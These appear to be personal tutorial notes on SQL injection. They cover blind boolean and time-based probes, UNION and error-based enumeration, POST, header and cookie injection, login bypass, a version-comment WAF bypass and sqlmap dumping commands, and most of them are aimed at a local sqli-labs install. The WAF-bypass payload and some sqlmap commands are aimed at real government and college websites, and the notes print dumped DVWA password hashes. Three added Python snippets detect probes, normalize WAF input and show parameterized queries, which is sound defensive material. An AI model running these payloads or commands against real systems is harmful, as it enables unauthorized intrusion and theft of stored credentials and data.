Blind SQLi
Blind SQL (Structured Query Language) injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not fixed the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL injection; the only difference is the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to extract data by asking the database a series of true or false questions. This makes exploiting the SQL injection vulnerability more difficult, but not impossible.
http://www.mysqltutorial.org/mysql-substring.aspx
*NOTE: the URL above documents the MySQL string functions (such as SUBSTRING) used in blind SQL injection; read it for self-study.
https://null-byte.wonderhowto.com/forum/explotation-blind-boolean-based-sql-injection-by-mohamed-ahmed-0179938/
*NOTE: Null Byte forum post on boolean-based blind SQL injection, for self-study.
Practical side:
Blind SQLI
Blind boolean-based SQL injection.
and 1=1 {true}
and 1=2 {false}
and "a"="b"
and database()="xyz"
we cannot guess the database name, so we try some MySQL string functions to extract it from the database one character at a time.
and substring(database(),1,1)="a"
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),1,1)="s" --
{true, which means the first character of the database name is s}
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),2,1)="e" --
{true, the second character of the database name is e}
Blind Time-based SQL Injection.
Time-Based SQL Injection
Time-based SQL injection involves sending requests to the database and analyzing server response times in order to deduce information. We can do this by taking advantage of sleep and time delay functions that are utilized in database systems. Like before, we can use the ASCII() and SUBSTRING() functions to aid in enumerating a field along with a new function called SLEEP().
https://null-byte.wonderhowto.com/how-to/sql-injection-101-advanced-techniques-for-maximum-exploitation-0184658/
Learn SQLi Query Fixing
- identify sqli vulnerability
'
"
\ - balance the query
http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id ='id' where name ='xyz' {background}
how to fix
http://192.168.1.103/sqli-labs-master/Less-1/?id=1' --
select id ='1' -- ' where name ='xyz' {background}
Less-2
in background
select id=1 -- where name =xyz
how to fix query
http://192.168.1.103/sqli-labs-master/Less-2/?id=1 --
Less-3
in background
select id = ('1\') where name =('xyz')
SQLI Through Get Based
Less-1
http://192.168.1.103/sqli-labs-master/Less-1/?id=1' -- {balanced query}
- find total no of vulnerable columns
order by 1 {same page}
order by 2 {same page}
order by n {different page}
so n-1 columns are present
http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1 --
- find exact no of vulnerable columns out of these n-1
union all select 1,2,...,n-1
example
union all select 1,2,3
select id=-1' union all select 1,2,3 -- where name =xyz
executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --
- execute any database sqli query there
in the column number that is reflected on the page
example - database()
version()
user()
executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3 --
http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user() --
situation: you are getting an error but not the output of the union sqli statement; in that case there may be error-based sqli or double-query-based sql injection.
http://192.168.1.103/sqli-labs-master/Less-5/?id=-1' --
error/double based sqli query -> hackbar->error/double->get database
Blind SQLI
blind boolean-based sqli
and 1=1 {true}
and 1=2 {false}
and "a"="b"
and database()="xyz"
we cannot guess the database name
and substring(database(),1,1)="a"
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),1,1)="s" -- {true value, which means the first character of the database name is s}
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),2,1)="e" -- {true, the second character of the database name is e}
blind time-based sqli
' and sleep(10) --
" and sleep(10) --
') and sleep(10) --
how to extract the database name with blind time-based sqli
' and sleep(10) and 1=1 --
I sent http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="security" -- and it is sleeping, which means {true}
http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="xyz" -- {it is not sleeping for 10 sec}
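From the defender's side, the boolean and time-based probes in this section leave a recognisable trail in web server logs. The Python below is an added example (not code from the page or from sqli-labs) that parses constructed access-log lines, URL-decodes each query string and flags the probe patterns shown above, treating a SLEEP() request as confirmed when the recorded response time actually exceeded an assumed threshold.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (not from the page): Apache combined format with the
# request duration in seconds appended. The probes mirror the Less-8 / Less-9 requests.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Oct/2023:10:00:01 +0000] "GET /sqli-labs-master/Less-8/?id=1 HTTP/1.1" 200 512 0.004
192.168.1.50 - - [10/Oct/2023:10:00:02 +0000] "GET /sqli-labs-master/Less-8/?id=1'%20and%20substring(database(),1,1)=%22s%22%20-- HTTP/1.1" 200 512 0.005
192.168.1.50 - - [10/Oct/2023:10:00:03 +0000] "GET /sqli-labs-master/Less-8/?id=1'%20and%201=2%20-- HTTP/1.1" 200 498 0.004
192.168.1.50 - - [10/Oct/2023:10:00:15 +0000] "GET /sqli-labs-master/Less-9/?id=1'%20and%20sleep(10)%20and%20database()=%22security%22%20-- HTTP/1.1" 200 512 10.021
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<secs>[\d.]+)$')

SLOW_SECONDS = 5.0  # assumed threshold; set it well above the app's normal latency


def classify(path, secs):
    """Return the indicator names that fire for one request path (URL-decoded first)."""
    q = unquote_plus(path).lower()
    hits = []
    if re.search(r"\b(and|or)\s+\d+\s*=\s*\d+", q):          # and 1=1 / and 1=2 probes
        hits.append("boolean-tautology")
    if re.search(r"substring\s*\(\s*database\s*\(", q):      # character-by-character extraction
        hits.append("boolean-char-extraction")
    if re.search(r"\b(sleep|benchmark)\s*\(", q):            # time-based probe
        hits.append("time-based-probe")
        if secs >= SLOW_SECONDS:                             # the delay actually happened
            hits.append("time-based-delay-observed")
    return hits


def scan(log_text):
    """Parse each log line and return (client ip, path, indicators) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["path"], float(m["secs"]))
        if hits:
            findings.append((m["ip"], m["path"], hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits), path)
```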
Exploitation of GET Based sqli
- Database List -
hackbar->union->database->group_concat
information_schema
challenges
dvwa
metasploit
mysql
owasp10
security
tikiwiki
tikiwiki195
- find tables of a database - dvwa
hackbar->union->tables->group_concat
guestbook
users
- find columns of a table - guestbook
comment_id
comment
name
- data of those columns
name,comment
hackbar->union->data->group_concat
name,"<---->",comment,"---->",third
Error Based Double Query Exploitation
what about the other databases?
to fetch the remaining databases
you have to increase the first value of the LIMIT clause
LIMIT 1,1 - challenges
LIMIT 2,1 - dvwa
LIMIT 3,1 - metasploit
tables
default tables
LIMIT 0,1 - guestbook
LIMIT 1,1 - users
LIMIT 2,1 - you are not getting anything, which means there are only two tables
columns for double-query based
LIMIT 0,1 - user_id
LIMIT 1,1 - first_name
LIMIT 2,1 - last_name
LIMIT 3,1 - user
LIMIT 4,1 - password
LIMIT 5,1 - avatar
LIMIT 0,1 - nothing
Data of these columns
user     password
admin    5f4dcc3b5aa765d61d8327deb882cf99
Gordon   e99a18c428cb38d5f260853678922e03
1337     8d3533d75ae2c3966d7e0d4fcc69216b
Pablo
Post Based SQLI
Balance the query
' --
problem: the trailing -- is not working with POST-based forms here
instead use -- followed by a space ( )
or you can also use # to fix the query
both are used to comment out the rest of the sqli query
-- or #
find total no of vulnerable columns
order by 1
find exact no of vulnerable columns
' union all select 1,2 #
execute database query
' union all select database(),user() #
Less -12
") union all select 1,2 #
") union all select database(),user() #
Less-13
') #
') order by 3#
') order by 2 # {order by 2 worked}
') union all select 1,2#
situation: you are getting an error but not the output of the union sqli statement; in that case there may be error-based sqli or double-query-based sqli
" AND(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 1,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #
Blind boolean-based post-based sqli
Less-15
' OR 1=1 #
" OR 1=1 #
') OR 1=1 #
") OR 1=1 #
' OR database()="security" #
' OR substring(database(),1,1)="a" #
' OR substring(database(),1,1)="s" #
first character of the database name is s
' OR substring(database(),2,1)="e" #
second character of the database name is e
Less-16
Blind time-based
' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) # {worked}
") OR sleep(10) and 1=1 #
") OR sleep(10) and substring(database(),3,1)="a" #
the application is sleeping when we fire this
") OR sleep(10) and substring(database(),3,1)="c" #
that means the third character of the database name is c
Less-17
understand the business logic here:
password reset requires an existing user
the default username for this lab is admin
Exploitation of POST Based SQLI
Less-11
inject database query
- database list
hackbar -> union -> database-> group_concat
' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #
information_schema
challenges
dvwa
metasploit
mysql
owasp10
security
tikiwiki
tikiwiki195
- find tables of a database - security
' union all select (SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479),2 #
emails
referrers
user-agents
users
- find columns of a table - users
hackbar->union->columns->group_concat
' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #
user_id
first_name
last_name
user
password
avatar
id
username
password
- data of these columns - user, password
user,"<----->",password
' union all select 1,(SELECT GROUP_CONCAT(username,"<----->",password SEPARATOR 0x3c62723e) FROM security.users) #
Error Based Double Query Exploitation Post Method
') AND(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 3,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #
Header Based sqli
if an application stores your request header values in its database, there may be header-based sqli
for example after you have logged in to the application
Cookie Based SQLI
target – testphp.vulnweb.com
Balance Query
' --
' and 'x'='x
select login='test/test' and 'x'='x ' where something other part of query
Header Based sqli
Balance Query
' --
' and 'a'='a
select referrer='value ' OR SLEEP(5) and 'a'='a ' something other part of query
WAF (Web Application Firewall) bypassing.
earlier I tried
' order by 1 --+
when I tried
' union all select 1,2,3,4,5,6,7 --+
I got a "not acceptable" error
either union may be an illegal keyword
or maybe all will be illegal input
select
illegal word (word) = /*!12345word*/
' /*!12345union*/ all select 1,2,3 --+
http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+
now exploit this
all database list
hackbar->union->database->group_concat
in any reflected column number
(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)
' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+
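The version-comment trick above works against a keyword filter because the digits are glued to the keyword (12345union), so a whole-word match for union never fires even though MySQL still executes it. The Python below is an added example, not code from the page or from any WAF product: it shows a whole-word UNION...SELECT check failing on the raw parameter and succeeding once the parameter is URL-decoded and version comments are unwrapped, which is the normalization a filter needs to do before matching.

```python
import re
from urllib.parse import unquote_plus

# Whole-word signature of the kind a keyword filter uses: UNION [ALL|DISTINCT] SELECT
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?\bselect\b", re.I)
# MySQL version comment: the server runs the inner text when its version is at least
# the number given, so /*!12345union*/ is executed as "union"
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
# Ordinary comments contribute nothing to the query and are dropped
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def naive_check(raw):
    """Match the signature against the raw parameter, as the bypassed filter does."""
    return bool(UNION_SELECT.search(raw))


def normalize(raw):
    """Reduce a parameter to the SQL the database will actually see."""
    s = unquote_plus(raw)                  # %20 and + become spaces
    s = VERSION_COMMENT.sub(r" \1 ", s)    # keep the keyword hidden in a version comment
    s = PLAIN_COMMENT.sub(" ", s)
    s = re.sub(r"\s+", " ", s)             # collapse the whitespace that is left
    return s.strip()


def normalized_check(raw):
    """Match the same signature after normalization."""
    return bool(UNION_SELECT.search(normalize(raw)))


if __name__ == "__main__":
    for p in ("' union all select 1,2,3 --+",
              "' /*!12345union*/ all select 1,2,3 --+",
              "'+/*!12345union*/+all+/*!12345select*/+1,2,3+--+"):
        print(naive_check(p), normalized_check(p), normalize(p))
```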
Authentication Bypassing through SQLI
let's assume the backend query of the login page is
select username ='value1'&password='value2' where some other part of query
value1 = ' OR 1=1 --
select username ='' OR 1=1 -- '&password='value2' where some other part of query
value1 = 1' OR '1'='1
select username ='1' OR '1'='1 '&password='value2' where some other part of query
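The real fix for both the quote-balancing probes in the Less-1/2/3 section and the login bypass above is to stop pasting input into the SQL string. The Python below is an added example, not the lab's or the page's code; it uses an in-memory SQLite table with constructed rows (the lab runs MySQL, but the quoting and -- comment behaviour used here is the same) and puts each concatenated query beside its parameterized form.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a users table (sample rows; plaintext only for the demo)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return con


def lookup_vulnerable(con, id_value):
    """Less-1 style lookup: the id is pasted between quotes, so a stray quote breaks the SQL.
    Returns the matching usernames, or the database error text when the query is malformed."""
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % id_value
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError as err:
        return "ERROR: %s" % err


def lookup_safe(con, id_value):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    rows = con.execute("SELECT username FROM users WHERE id=? LIMIT 1", (id_value,))
    return [row[0] for row in rows]


def login_vulnerable(con, username, password):
    """Login built like the page's pseudo-SQL: ' OR 1=1 -- comments out the password check."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    """Parameterized login: the tautology is compared as a literal username and matches nobody."""
    rows = con.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (username, password))
    return [row[0] for row in rows]


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "1'"), lookup_safe(con, "1'"))
    print(login_vulnerable(con, "' OR 1=1 --", "wrong"), login_safe(con, "' OR 1=1 --", "wrong"))
```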
Less-11
SQLMAP GET Based
python sqlmap.py -u "http://192.168.0.103/sqli-labs-master/Less-1/?id=1*" --batch --banner
- database list
--dbs
example
python sqlmap.py -u "http://192.168.0.103/sqli-labs-master/Less-1/?id=1*" --batch --banner --dbs
- find tables of a database - dvwa
-D DBNAME --tables
example
python sqlmap.py -u "http://192.168.0.103/sqli-labs-master/Less-1/?id=1*" --batch --banner -D dvwa --tables
- columns of any table - users
-D DBNAME -T TBNAME --columns
example:
python sqlmap.py -u "http://192.168.0.103/sqli-labs-master/Less-1/?id=1*" --batch --banner -D dvwa -T users --columns
- data of these columns - user, first_name, password
-D DBNAME -T TBNAME -C col1,col2,col3 --dump
example:
python sqlmap.py -u "http://192.168.0.103/sqli-labs-master/Less-1/?id=1*" --batch --banner -D dvwa -T users -C user,first_name,password --dump
POST | Header | and Cookie based SQLI through SQLmap
commands
python sqlmap.py -r requestfile --batch --banner
python sqlmap.py -r less11.txt --batch --banner
WAF Bypass with sqlmap
sqlmap.py -u "URL" --batch --banner --tamper=modsecurityversioned
python sqlmap.py -u "http://multan.gov.pk/page.php?data=50*" --batch --banner --tamper=modsecurityversioned
python sqlmap.py -u "http://citicollege.edu.pk/main.php?Id=1*" --batch --banner